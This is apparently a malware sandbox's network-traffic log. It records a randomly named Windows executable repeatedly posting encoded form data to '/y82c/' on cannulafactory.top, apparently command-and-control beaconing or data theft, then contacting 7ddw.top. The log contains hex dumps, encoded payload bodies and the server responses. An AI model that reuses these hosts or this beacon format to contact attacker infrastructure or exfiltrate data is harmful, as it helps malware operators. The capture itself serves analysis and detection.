                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 47 44 56 7a 70 4d 77 69 30 72 45 77 72 7a 51 49 6c 65 62 51 4c 5a 67 38 36 62 7a 2b 6d 77 6b 56 55 37 55 61 32 5a 4b 69 50 77 32 63 44 33 69 59 63 65 6d 55 2b 4a 48 43 31 35 47 68 44 37 57 44 4f 71 61 76 33 73 4f 42 35 39 66 77 68 51 36 6e 31 59 2b 4d 48 31 64 51 32 49 62 47 78 56 58 39 53 33 58 54 74 32 75 31 64 50 32 79 45 55 4d 4b 47 74 65 62 57 79 73 58 4c 69 72 7a 51 59 38 57 62 66 71 44 47 53 62 45 71 58 5a 76 71 49 6a 64 56 45 55 62 77 49 47 69 54 4d 7a 78 47 58 6e 63 2f 4d 72 41 6f 52 4b 78 56 54 69 33 37 56 4b 74 33 6d 4a 47 41 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=hJK5Y1p6zryccGDVzpMwi0rEwrzQIlebQLZg86bz+mwkVU7Ua2ZKiPw2cD3iYcemU+JHC15GhD7WDOqav3sOB59fwhQ6n1Y+MH1dQ2IbGxVX9S3XTt2u1dP2yEUMKGtebWysXLirzQY8WbfqDGSbEqXZvqIjdVEUbwIGiTMzxGXnc/MrAoRKxVTi37VKt3mJGA==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532598019 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              x-sorting-hat-podid: 156
                                                                                                                                                                                                                                                              x-sorting-hat-shopid: 68519428253
                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                              x-frame-options: DENY
                                                                                                                                                                                                                                                              x-shopid: 68519428253
                                                                                                                                                                                                                                                              x-shardid: 156
                                                                                                                                                                                                                                                              content-language: en-HK
                                                                                                                                                                                                                                                              x-shopify-nginx-no-cookies: 0
                                                                                                                                                                                                                                                              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:49 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:49 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:49 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_y=6bab0783-0043-4cd0-b2d1-ef924f93f83d; Expires=Thu, 09-Oct-25 11:38:49 GMT; Domain=cannulafactory.top; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_s=c8048fc5-4b7a-4fe6-a81c-481de043f12a; Expires=Wed, 09-Oct-24 12:08:49 GMT; Domain=cannulafactory.top;
                                                                                                                                                                                                                                                              Data Raw:
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532701969 CEST1280INData Raw: 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 36 36 61 30 36 31 35 37 2d 65 62 65 61 2d 34 39 64 34 2d 39 63 62 30 2d 30 38 38 30 31 31 65 38 31 39 32 30 2d 31 37 32 38 34 37 33 39 32 39
                                                                                                                                                                                                                                                              Data Ascii: ath=/; SameSite=Laxx-request-id: 66a06157-ebea-49d4-9cb0-088011e81920-1728473929server-timing: processing;dur=243content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532716990 CEST1289INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                                                                                                              Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532726049 CEST375INData Raw: 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c 36 fd 42
                                                                                                                                                                                                                                                              Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532735109 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              22192.168.11.204976323.227.38.7480900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.773004055 CEST849OUTPOST /y82c/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cannulafactory.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cannulafactory.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cannulafactory.top/y82c/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 6d 54 56 78 49 4d 77 79 6b 72 44 31 72 7a 51 47 46 65 66 51 4c 6c 67 38 2f 69 6f 2b 7a 41 6b 56 32 7a 55 62 30 78 4b 6c 50 77 32 54 6a 33 6e 56 38 65 62 55 2b 31 50 43 30 46 47 68 48 62 57 44 4c 4f 61 75 41 77 50 41 70 39 5a 2f 42 51 43 6a 31 59 2b 4d 48 31 64 51 32 64 2b 47 78 39 58 39 6a 6e 58 54 4d 32 76 35 39 50 33 6c 30 55 4d 4f 47 74 61 62 57 79 4f 58 4b 2b 42 7a 57 55 38 57 65 62 71 44 58 53 63 4b 71 57 53 72 71 4a 52 53 56 46 51 55 7a 63 68 76 56 55 4e 78 31 7a 2f 55 4a 64 78 64 61 6c 75 79 47 50 51 7a 4c 73 69 76 31 6e 53 62 47 77 4c 2b 4e 53 6f 79 39 4d 61 4c 66 68 43 56 6e 7a 37 35 62 6f 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=hJK5Y1p6zryccmTVxIMwykrD1rzQGFefQLlg8/io+zAkV2zUb0xKlPw2Tj3nV8ebU+1PC0FGhHbWDLOauAwPAp9Z/BQCj1Y+MH1dQ2d+Gx9X9jnXTM2v59P3l0UMOGtabWyOXK+BzWU8WebqDXScKqWSrqJRSVFQUzchvVUNx1z/UJdxdaluyGPQzLsiv1nSbGwL+NSoy9MaLfhCVnz75bo=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415227890 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:52 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              x-sorting-hat-podid: 156
                                                                                                                                                                                                                                                              x-sorting-hat-shopid: 68519428253
                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                              x-frame-options: DENY
                                                                                                                                                                                                                                                              x-shopid: 68519428253
                                                                                                                                                                                                                                                              x-shardid: 156
                                                                                                                                                                                                                                                              content-language: en-HK
                                                                                                                                                                                                                                                              x-shopify-nginx-no-cookies: 0
                                                                                                                                                                                                                                                              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:52 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:52 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:52 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_y=3d162a42-eb70-4f01-aa59-ffd04ffcecbf; Expires=Thu, 09-Oct-25 11:38:52 GMT; Domain=cannulafactory.top; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_s=d6bd0a50-9099-4704-ac58-8121e8bbcbf4; Expires=Wed, 09-Oct-24 12:08:52 GMT; Domain=cannulafactory.top;
                                                                                                                                                                                                                                                              Data Raw:
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415242910 CEST1280INData Raw: 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 31 65 66 33 35 36 63 61 2d 34 36 64 62 2d 34 36 38 39 2d 38 64 30 66 2d 38 63 34 61 34 61 39 34 65 66 30 30 2d 31 37 32 38 34 37 33 39 33 31
                                                                                                                                                                                                                                                              Data Ascii: ath=/; SameSite=Laxx-request-id: 1ef356ca-46db-4689-8d0f-8c4a4a94ef00-1728473931server-timing: processing;dur=274content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415321112 CEST1289INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                                                                                                              Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415334940 CEST380INData Raw: 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c 36 fd 42
                                                                                                                                                                                                                                                              Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              23192.168.11.204976423.227.38.7480900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398884058 CEST1289OUTPOST /y82c/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cannulafactory.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cannulafactory.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cannulafactory.top/y82c/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 6d 54 56 78 49 4d 77 79 6b 72 44 31 72 7a 51 47 46 65 66 51 4c 6c 67 38 2f 69 6f 2b 79 55 6b 56 6a 6e 55 61 56 78 4b 6b 50 77 32 4e 7a 33 6d 56 38 65 38 55 2b 74 4c 43 30 4a 38 68 42 58 57 4d 4e 53 61 6e 56 45 50 56 35 39 5a 39 42 51 35 6e 31 59 52 4d 48 6c 5a 51 32 4e 2b 47 78 39 58 39 67 76 58 48 4e 32 76 2f 39 50 32 79 45 56 4e 4b 47 74 79 62 57 37 35 58 4b 36 37 30 6d 30 38 56 2b 72 71 41 68 4f 63 43 71 57 51 73 71 4a 4a 53 56 4a 66 55 7a 51 74 76 51 6f 6a 78 30 33 2f 58 65 73 35 4d 4a 31 6d 78 33 72 6e 38 34 38 45 6b 57 2f 36 5a 45 30 34 34 4f 43 4a 7a 61 49 6a 4f 73 68 4b 52 32 37 45 36 4d 4b 32 44 68 57 75 61 35 79 6d 70 43 6b 6f 57 64 51 2f 37 6b 4c 68 45 70 6f 6c 32 77 63 56 5a 53 64 42 78 55 42 31 4d 32 43 77 66 50 6a 52 31 50 50 36 37 30 56 36 45 48 6e 37 4c 32 53 6f 49 6a 57 79 6d 56 47 52 72 45 49 42 68 75 6c 41 74 35 35 5a 39 68 36 6c 76 51 54 4b 64 4f 4d 49 71 7a 68 75 74 71 6f 4a 55 4d 6c 62 34 46 50 49 49 5a 76 38 51 49 66 4c 4e [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=hJK5Y1p6zryccmTVxIMwykrD1rzQGFefQLlg8/io+yUkVjnUaVxKkPw2Nz3mV8e8U+tLC0J8hBXWMNSanVEPV59Z9BQ5n1YRMHlZQ2N+Gx9X9gvXHN2v/9P2yEVNKGtybW75XK670m08V+rqAhOcCqWQsqJJSVJfUzQtvQojx03/Xes5MJ1mx3rn848EkW/6ZE044OCJzaIjOshKR27E6MK2DhWua5ympCkoWdQ/7kLhEpol2wcVZSdBxUB1M2CwfPjR1PP670V6EHn7L2SoIjWymVGRrEIBhulAt55Z9h6lvQTKdOMIqzhutqoJUMlb4FPIIZv8QIfLNKtRw5HIu2BnmOEIv83XPhCEX779GK9CIjxi4FaqLqap79qGay6IudP78wNjjNYButkql6Z4AcSjv6oDUCfWd+r2mTvw1v6hn5DldkZPowQWYqrOEqjeP4thZTpThiZMKxRos/7g1iYWMX0+vHmmjh8fLc4iUpZqr0aXcILikMh6qcYQUeqJWSUeBe2KkHX5zxWcNBwcFyQRtLmwHZ5S0pV8ONzCBgeIy2v/Qu8gFkIHbSuY/hG8YClnb3W4hu+3wjV4c5MhmIbZXND5O2GbjzFjAyZJ4k0iEZkPxeFn6IdUWGx/OHqmJWS1FBf7DZoLcrL
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398936033 CEST3867OUTData Raw: 2b 48 6a 43 51 67 5a 53 54 6f 6d 44 30 61 68 78 72 31 4e 31 6a 4b 58 59 57 75 2f 32 6d 63 39 77 6e 33 77 77 48 39 71 71 35 45 77 77 68 4a 30 55 57 30 66 74 53 32 6d 44 54 38 2f 7a 79 69 35 44 55 71 75 39 71 38 67 63 61 58 6a 61 37 7a 57 43 30 79
                                                                                                                                                                                                                                                              Data Ascii: +HjCQgZSTomD0ahxr1N1jKXYWu/2mc9wn3wwH9qq5EwwhJ0UW0ftS2mDT8/zyi5DUqu9q8gcaXja7zWC0yR5iJUIWsMuLtMY+gum7O4xoX2y3zJ3ycH/lnl5VuqmE3TN78a5duMexIKcM8LaXxawg9nOfM02TDzup+r7nM4soWuA3Xy3JvTEN5feVtWieVgTRLVSzxPHK3pOEticSpSXD6+i1ZRd4g/NnffakmQfb4OWc2K6Rll
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398982048 CEST2842OUTData Raw: 51 51 77 65 6f 70 52 58 57 39 35 6e 6b 36 62 52 33 30 6f 65 47 42 78 47 77 73 62 59 46 2f 6c 6d 63 37 38 54 76 69 73 72 50 52 45 77 4d 6d 63 36 77 42 55 6f 64 6d 74 6b 38 2b 74 4d 6b 35 6f 33 30 48 66 38 44 36 68 31 63 51 5a 57 49 6d 70 30 6d 71
                                                                                                                                                                                                                                                              Data Ascii: QQweopRXW95nk6bR30oeGBxGwsbYF/lmc78TvisrPREwMmc6wBUodmtk8+tMk5o30Hf8D6h1cQZWImp0mq4r6ZETD35gT5fXDN5AOe4M+1w0Jn9e6WMd9Qu2cfnQbf4dN/zHWGvvwZPbOqo1Z/knNc6Ik5udrTg1wXZvKGL/R4SwlarHH49/sTnL6APPxTAOgTb5c+78ZAUdUXcqtL+vPWTB2tSbIMw2Sat7es/cmjxroRPz/SD
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689748049 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              x-sorting-hat-podid: 156
                                                                                                                                                                                                                                                              x-sorting-hat-shopid: 68519428253
                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                              x-frame-options: DENY
                                                                                                                                                                                                                                                              x-shopid: 68519428253
                                                                                                                                                                                                                                                              x-shardid: 156
                                                                                                                                                                                                                                                              content-language: en-HK
                                                                                                                                                                                                                                                              x-shopify-nginx-no-cookies: 0
                                                                                                                                                                                                                                                              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:54 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:54 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:54 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_y=77fdd3de-6657-4e10-9ca7-aefa942072f6; Expires=Thu, 09-Oct-25 11:38:54 GMT; Domain=cannulafactory.top; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_s=64c69e05-8692-4034-b483-b1d5831203db; Expires=Wed, 09-Oct-24 12:08:54 GMT; Domain=cannulafactory.top;
                                                                                                                                                                                                                                                              Data Raw:
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689855099 CEST1272INData Raw: 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 64 36 39 31 33 30 62 62 2d 66 64 35 38 2d 34 30 31 31 2d 38 66 39 33 2d 64 32 35 36 36 36 64 34 35 32 66 62 2d 31 37 32 38 34 37 33 39 33 34
                                                                                                                                                                                                                                                              Data Ascii: ath=/; SameSite=Laxx-request-id: d69130bb-fd58-4011-8f93-d25666d452fb-1728473934server-timing: processing;dur=120content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689883947 CEST1289INData Raw: 37 0d 0a 1f 8b 08 00 00 00 00 0d 0a 36 37 32 0d 0a 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9
                                                                                                                                                                                                                                                              Data Ascii: 7672X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689897060 CEST380INData Raw: 78 01 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00
                                                                                                                                                                                                                                                              Data Ascii: xYc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tV
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689913034 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              24192.168.11.204976523.227.38.7480900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.025243998 CEST555OUTGET /y82c/?FlS=3ldH5dkH-dBLf&9B6h=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cannulafactory.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.190778971 CEST1289INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              x-sorting-hat-podid: 156
                                                                                                                                                                                                                                                              x-sorting-hat-shopid: 68519428253
                                                                                                                                                                                                                                                              x-storefront-renderer-rendered: 1
                                                                                                                                                                                                                                                              location: https://cannulafactory.top/y82c?FlS=3ldH5dkH-dBLf&9B6h=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M=
                                                                                                                                                                                                                                                              x-redirect-reason: https_required
                                                                                                                                                                                                                                                              x-frame-options: DENY
                                                                                                                                                                                                                                                              content-security-policy: frame-ancestors 'none';
                                                                                                                                                                                                                                                              x-shopid: 68519428253
                                                                                                                                                                                                                                                              x-shardid: 156
                                                                                                                                                                                                                                                              vary: Accept
                                                                                                                                                                                                                                                              powered-by: Shopify
                                                                                                                                                                                                                                                              server-timing: processing;dur=11;desc="gc:1", db;dur=4, asn;desc="174", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="fg5l", requestID;desc="0f8409e5-8fe5-47a9-b3a6-8a6e241e9a63-1728473937"
                                                                                                                                                                                                                                                              x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                                                                                                                                                                                                                                              x-request-id: 0f8409e5-8fe5-47a9-b3a6-8a6e241e9a63-1728473937
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7eI1vQj5GQ8F%2FkAeGlnFlOWW1L1sYE1%2FqTA5jFrfMO5L5LAscfVb7XYqp2hgZ0ggNaruKVbdg%2FV0vQoulC7%2BNTXRK8UUOUIHy8kfDFfCZWWiechzlvL7jwh8TTBE2to37OV6G3uKHI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_
                                                                                                                                                                                                                                                              Data Raw:
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.190790892 CEST248INData Raw: 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 35 39 2e 39 39 39 39 34 33 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20
                                                                                                                                                                                                                                                              Data Ascii: ge":604800}Server-Timing: cfRequestDuration;dur=59.999943X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8cfe165ab8944386-EW


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              25192.168.11.2049766154.23.184.20780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.609004974 CEST799OUTPOST /pcjw/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.7ddw.top
